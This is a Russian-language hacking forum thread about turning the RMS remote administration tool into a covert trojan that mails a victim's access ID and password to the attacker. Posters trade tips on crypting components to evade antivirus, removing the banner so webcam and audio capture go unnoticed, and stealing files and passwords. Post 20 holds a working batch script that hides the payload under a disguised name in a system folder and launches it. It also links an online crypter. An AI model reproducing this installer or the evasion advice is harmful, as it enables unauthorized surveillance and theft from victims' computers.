RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. blackunder
    blackunder Новичок
    Симпатии:
    2
    пипл у меня сборка палится почти всеми главными антивирусами !! как избежать этого ??? сборка гдет месяц не палилась антивирусами и вот началось =( какому файлу надо делать крипт ? возможно криптануть ?

3 фев 2012
  2. IceBolt
    IceBolt Новичок
    Симпатии:
    1
    Со старой 5.0 сборкой стало много косяков из за патча,хотя он не принципиально нужный,просто хотелось добиться удаления баннера.Патченные как писал выше баннер убирали,но работал только звук,а видео не захватывало.
    Перешёл на версию 5.1beta3-оказывается гораздо удобнее.Только один сервер и можно его впаривать нескольким машинам,ID и пасс новые на почту приходят.Пропатчиваются в установленном состоянии уже,удалённо легко и быстро заменой 2х файликов,после чего отлично работаею вебка вместе со звуком без баннера,конечно диод только выдаёт-))
    А вот только сегодня прочекал составные части сборки на вирусчекере.Отдельно,потому что архивы(чем является сборка)в халявной версии чекера не принимают))

3 фев 2012
  3. blackunder
    blackunder Новичок
    Симпатии:
    2
    КТО ЗНАЕТ ЧТО ДЕлать ??? чтоб не палился антивирусами ????

3 фев 2012
  4. vkodm
    vkodm Новичок
    Симпатии:
    0
    Файл Install.bat - криптовал на онлайн крипторе для батников (на форуме уже была ссылка на него) http://cp1251.darkoff.ru/crypter.php
    Что теперь делать с *.msi - не знаю. Самое плохое - АВ палят rutserv.exe... Т.к. мне главное что не спалил только ДрВэб - пытаюсь криптовать на одном компе и проверяю на втором. Пока без результатно (криптора нет и... мозгов).
    У кого вышло обойти АВ - маякните!

3 фев 2012
  5. IceBolt
    IceBolt Новичок
    Симпатии:
    1
    Кто подскажет,возможно ли пересобрать сборку по типу старого варианта,как то msi пакет пересобрать с криптовкой составляющих?

3 фев 2012
  6. TDI
    TDI Новичок
    Симпатии:
    32
    возможно
    Код:
    пересобрать сборку по типу старого варианта

3 фев 2012
  7. IceBolt
    IceBolt Новичок
    Симпатии:
    1
    TDI спасибо!:pivo:

3 фев 2012
  8. blackunder
    blackunder Новичок
    Симпатии:
    2
    Если пересобрать сборку по типу старого варианта не будет палится антиврусами ? как это сделать ?

4 фев 2012
  9. TDI
    TDI Новичок
    Симпатии:
    32
    Вот рабочий пример
    Код:
    не будет палится антиврусами ?
    Будет палится антиврусами, нужно самому думать как собрать штоб АВ не орали

4 фев 2012
  10. edonkey
    edonkey Новичок
    Симпатии:
    0
    можешь скинуть 5.1b3 и пропатченные файлы?

update
    сам спросил, сам ответил)
    копирую для тех кто тож проморгал

4 фев 2012
  11. vkodm
    vkodm Новичок
    Симпатии:
    0
    У меня АВ палит... После сборки новой... Палит Hookdrv.dll - может кто подскажет что возможно сделать. И еще на компе (куда кидаю сервер) щимится и открывает через браузер по умолчанию домашнюю страничку проги "http://rmansys.ru/" Может у кого есть соображения как с этим бороться... Хелп.

4 фев 2012
  12. blackunder
    blackunder Новичок
    Симпатии:
    2
    А я вобше не смог собрать эту сборку ... иконка в трее стоит =( везде ставил галочки как в прошлой и никак ... наверно такая вешь как первая больше не будет

4 фев 2012
  13. vkodm
    vkodm Новичок
    Симпатии:
    0
    Я собирал на одном компе а проверял на втором, где стоит АВ. Сначала весь файл АВ удалил. А когда закинул по отдельности в папку и проверил то удалил библиотеку - постом выше описывал... 3 сутки доч\сь и не выходит. Может на РАТы перейти... Так там без криптовки толку нет а крипторы все либо с заоблачный хайдом либо когда уже все АВ их палят хайд снижают))) Наверно испанский прийдется учить :dontknow:

5 фев 2012
  14. Flasher
    Flasher Новичок
    Симпатии:
    0
    Его можно закриптовать?
    И всё же, как дела обстоят с банером?

5 фев 2012
  15. vkodm
    vkodm Новичок
    Симпатии:
    0
    Та что банер. Тут библиотека палится АВ!!! Сейчас пробую старую ДЛЛку втавить в новую сборку - пока без результатно. Точнее результат отрицательный. :angry:

5 фев 2012
  16. TDI
    TDI Новичок
    Симпатии:
    32
    таки вещи не криптуют.
    их нужно пересоберать и переписывать батники

5 фев 2012
  17. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    народ, напишите плз какая из сборок рабочая и беспалевная (со ссылкой). мне нужно просто стырить с компа папку с фалами. видеонаблюдение не нужно, точно так же как и звук.
    з.ы. поробовал сделать сборку с версией rms 5.1 (просто 5.1, без b), но после установки мне вылетает алерт что типа на ваш комп установлен серв и после этого вылетает страница разрабов. как убрать всю эту куиту?

5 фев 2012
  18. vkodm
    vkodm Новичок
    Симпатии:
    0
    От такого ушел собрав из http://narod.ru/disk/9840632001/utilities_v4.1.rar.html
    В соседней теме http://www.xaker.name/forvb/showthread.php?t=20588&page=43 прочитай обсуждения. Было тоже что и у тебя. Скачал с офиц.сайта и собрал - а там такое палево!!!

Пароль на архив 123123

Последнее редактирование: 5 фев 2012
    5 фев 2012
  19. Megatron13
    Megatron13 Новичок
    Симпатии:
    1
    слушай тут нод на батник ругается. как убрать? я так понял hitch.exe - sfx архив? можно тогда к нему в комментарии прописать этот батник? ругаться не будет? или есть какие другие варианты получше/еще попроще?

6 фев 2012
  20. vkodm
    vkodm Новичок
    Симпатии:
    0
    На счет НОДа не скажу но ДрВэб перестал ругаться на такой бат:

@echo off

mdir %SYSTEMROOT%\System32\sysfiles

copy /y "SMR.exe" "%SYSTEMROOT%\System32\sysfiles\SMR.exe"

attrib +s +h +r "%SYSTEMROOT%\System32\sysfiles\SMR.exe"

cd %SYSTEMROOT%\System32\sysfiles
    start SMR.exe

exit

В обсуждении TDI оставлял ссылку на онлайн криптовку bat - пробуй. Но bat зависит и какая сборка. В том который я использовал одно а ты может с другой сборкой... У меня без mpr. Задумка в том, что если там все пройдет то пароли стянуть смогу а если не пройдет то и смысл стилер совать? И файлы называются не так))) RMS.exe ->SMR.exe

6 фев 2012
Статус темы:
Закрыта.
Загрузка...